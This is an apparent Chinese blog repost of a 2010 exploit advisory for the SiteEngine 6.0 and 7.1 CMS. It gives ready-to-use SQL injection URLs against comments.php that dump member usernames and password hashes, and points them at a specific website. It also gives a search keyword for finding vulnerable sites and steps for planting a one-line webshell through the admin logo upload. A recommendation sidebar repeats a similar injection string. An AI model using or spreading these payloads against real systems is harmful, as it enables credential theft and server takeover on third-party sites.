SiteEngine 6.0&71. SQLInjection

SiteEngine SQL注入漏洞分析
最新推荐文章于 2025-09-08 20:52:48 发布
最新推荐文章于 2025-09-08 20:52:48 发布
阅读量102 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: shell php
原文链接:https://yq.aliyun.com/articles/436801
本文分析了SiteEngine6.0及7.1版本中由于评论功能开启导致的SQL注入漏洞,提供了具体的漏洞利用方式及获取Shell的方法。

#############################################################################
#标题:   SiteEngine 6.0 SQL注入漏洞
#日期:    2010-11-25
#作者: Beach
#Team:    www.linux520.com
#厂商: www.siteengine.net www.boka.cn
#关键字:    “Powered by SiteEngine”   //300,000 +~
#############################################################################
[*]描述:
   利用这个漏洞需要评论功能开启(默认开启)
#############################################################################
[*]利用:

http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5, … ,24,25,26+from+boka_members%23

#############################################################################
[*]上Shell:

管理后台: http://server/admin/
系统维护—> wap设置—> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) —>
确定—>马上浏览—>看图片属性即为一句话地址

#############################################################################

#############################################################################
#标题:   SiteEngine 7.1 SQL注入漏洞
#日期:    2010-11-25
#作者:    Beach
#Team:    www.linux520.com
#厂商:    www.siteengine.net www.boka.cn
#关键字:    “Powered by SiteEngine”   //300,000 +~
#############################################################################
[*]描述:
   利用这个漏洞需要评论功能开启,默认开启
#############################################################################
[*]利用:

企业门户版本:
[1]http://www.nhs8.com/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,…,38,39+from+boka_members%23

[2]http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,…,26,27+from+boka_members%23

可能字段数不一样, 自己尝试
==============================================================================
电子商务版本:

[+]http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,…,37,38+from+boka_members%23
#############################################################################

其他版本类似
#############################################################################
[*]上Shell:

管理后台: http://server/admin/
系统维护—> wap设置—> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) —>
确定—>马上浏览—>看图片属性即为一句话地址
#############################################################################



















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/432814,如需转载请自行联系原作者

SiteEngine漏洞
hit15105的专栏
04-06 1971
1)在百度中以“Powered by SiteEngine”为关键字进行搜索,随便点击一个网站,域名后输入如下代码(announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,username,4,5,6,7,password,9,10,11%20from%20boka_members%20/*)2)这段代码查询
ckeditor webshell .php,SiteEngine 7.1 会员上传漏洞拿WEBSHELL
weixin_33772728的博客
03-19 571
发布日期:2012-04.8发布作者: hackdn漏洞类型:文件上传漏洞描述:zend编码解密的不完整,也懒得看代码了,用Tamper之类的插件测试的POST参数,反正就是$sFile = $oFile['name'];的过滤太傻瓜了,貌似 第5版本之后就修改了函数了。。这次是会员发站内短信上传附件的漏洞,问题出在pms.php上,具体代码分析懒得啰嗦了,POC就不放了,都懂的。直接说方法:1:...
bicq php,BICQ   1、首先 软件跟QQ和MSN有很多类似的地方。因为现在 用户群在使用 WEB(ASP,PHP,...) 256万源代码下载- www.pudn.com...
weixin_35340181的博客
03-25 235
文件名称: BICQ下载 收藏√ [5 4 3 2 1]开发工具: PHP文件大小: 1684 KB上传时间: 2016-04-18下载次数: 0提 供 者: yq详细说明:1、首先BICQ软件跟QQ和MSN有很多类似的地方。因为现在有很多用户群在使用QQ和MSN,所以我们的BICQ做成QQ和MSN的风格对大家的适应性非常的强。2、客户资料设置:客户端有自己的资料设置,联系方式,B...
5.18日培训总结
静下心来,认真的研究技术。
05-18 330
Nat. Methods | 基于几何深度学习解密蛋白分子表面的相互作用指纹
DrugOne
12-21 2804
2019年12月,洛桑联邦理工学院和瑞士生物信息研究所的研究者在nature methods上提出使用分子表面的化学和几何指纹,来预测蛋白质和其他分子间的相互作用。1介绍蛋白质与其他生物...
php代码错误查找,PHP_php代码出现错误分析详解,错误类型: 一、未使用二进制 - phpStudy...
weixin_39846364的博客
03-12 518
php代码出现错误分析详解错误类型:一、未使用二进制上传代码:Fatal error: This encoded file is corrupted. Please refer to http://www.zend.com/support/support_faq.php?id=loader_file_corrupt for further help in/webhome/****.com/web/...
商业源码-编程源码-SiteEngine(建站引擎) v6.0 Build 20080101 个人免费版.zip
06-16
SiteEngine是一款功能强大的建站引擎,专为个人用户设计的免费版在2008年1月1日发布了v6.0 Build版本。这个压缩包包含了一整套用于构建和管理网站的源代码,使用户能够自定义和扩展其功能,以满足不同类型的网站需求...
SiteEngine(建站引擎) v6.0 Build 20080101 个人免费版.zip
07-06
修正删除siteengine.jpg图像在前台显示图片被删除的问题 修正编辑新闻时不能自动转换插入列表内容的问题 修正新闻管理员不能浏览显示要审批的新闻的问题 修正在Firefox下flash显示的文字高度不够的问题 修正不能...
SiteEngine.高级版.5.1.8.Build.0801
03-18
SiteEngine是一款功能强大的网站内容管理系统(CMS),专为构建和管理企业级网站而设计。它提供了高级的功能,如页面编辑、内容发布、用户管理、权限控制、多语言支持以及搜索引擎优化等,使得非技术人员也能轻松地...
SiteEngine网站建设管理系统网站建设100.doc
06-15
SiteEngine 网站建设管理系统是一款多功能的建站工具,能够适应各种规模的网站构建需求。无论是小型的静态页面网站,还是大型的包含新闻发布、产品发布、下载管理、会员管理等功能的复杂网站,SiteEngine 都能提供...
商业源码-编程源码-SiteEngine(建站引擎) v5.2 专业版.zip
06-16
8. **安全性**:作为一款商业级产品,SiteEngine在安全性方面做了充分考虑,包括数据加密、防止SQL注入、XSS攻击防护等,确保网站和用户数据的安全。 9. **备份与恢复**:为了防止数据丢失,SiteEngine提供了备份和...
Linux 中 export 命令用法总结
核电子探索者
09-04 1291
Linux中的export命令用于将变量导出为环境变量,使其能被当前Shell及其子进程访问。局部变量仅限当前Shell,而环境变量可跨进程传递。基本语法包括export 变量名=值(一步导出)或先定义再export(两步)。常用场景包括:临时设置环境变量(如PATH)、导出函数供子进程调用、取消导出(export -n)及查看环境变量(export -p)。持久化需将export命令写入~/.bashrc(用户级)或/etc/profile(系统级)。注意事项:带空格的值需引号包裹,子进程修改不影响父进程
STM32 - Embedded IDE - GCC - rt_thread_nano的终端msh>不工作的排查与解决
wallace89的博客
09-08 374
RT-Thread的MSH终端正常工作依赖链接脚本中的关键段定义。FSymTab和VSymTab段保存了shell命令的符号表,而.rti_fn*段则处理系统自动初始化函数。当链接脚本缺失这些段定义时,会导致符号表丢失和初始化失败,表现为MSH终端无法识别命令。解决方法是在链接脚本中明确保留这些段,并定义相应的边界符号(如__fsymtab_start/end),确保RT-Thread能正确加载命令和完成初始化。这两部分缺一不可,共同保障了RT-Thread系统的正常运行。
Shell 秘典(卷九)—— Linux系统中配置邮箱的发送功能
qq_41978931的博客
09-07 1158
本文详细介绍了在Linux系统中配置QQ邮箱发送功能的步骤,包括465和587两种SMTP端口的配置方法。主要内容涵盖:1)环境准备,安装mailx工具和证书管理工具;2)QQ邮箱SMTP服务开启和授权码获取;3)NSS证书数据库的创建与初始化;4)465端口(SSL加密)和587端口(STARTTLS)的具体配置;5)邮件发送测试和常见故障排除。通过本文指导,可实现Linux系统与QQ邮箱的安全连接,为服务器监控报警提供可靠的邮件通知功能。
bash:trtexec:command not found
qq_40725313的博客
09-08 102
环境变量未配置:若 TensorRT 已安装,但 trtexec 所在路径未添加到系统的 PATH 环境变量中,系统就无法找到该命令。trtexec 一般位于 TensorRT 安装目录的 bin 文件夹下(例如 /usr/src/tensorrt/bin)。若要永久生效,可将该命令添加到 ~/.bashrc 或 ~/.zshrc(根据使用的 shell)文件中,然后执行。下面忽略即可,只是为了检验tensorrt的位置是否在/usr/src/tensorrt。
辨析——汇编 shell C语言
最新发布
wyppywwyp的博客
09-08 207
是一种面向机器的低级语言,它和计算机硬件的操作紧密相关,几乎是一对一地对应机器指令。C 语言编写的代码需要经过编译器编译成目标机器的机器码,或者先编译成汇编代码,再由汇编器进一步处理成机器码。:在一些对性能要求极高或者需要直接访问特定硬件指令的场景下,C 语言程序中可以嵌入汇编代码。:严格来说,它不是传统意义上用于编写可执行程序的编程语言,而是一种命令解释环境。只是Shell 最终调用的系统底层函数,可能会涉及到汇编语言编写的代码片段。:属于高级语言,相比汇编语言,它更接近人类的自然语言和编程习惯。
CamX-Camera常用编译命令和adb指南
justXiaoSha的博客
09-07 51
设置屏幕dpi (常用的dpi有160mdpi, 240hdpi, 320xhdpi, 480xxhdpi)开串口: setprop log.tag.xtc_enable_serial_log 1。关串口: setprop log.tag.xtc_enable_serial_log 0。先用python把xml编译相关bin到out目录,然后再全编译就可以生效了。默认:adb shell wm size 360x320。编译:点击图标,填写bin文件名。配置ok后,如下图标会点亮。重置可用dpi如下命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值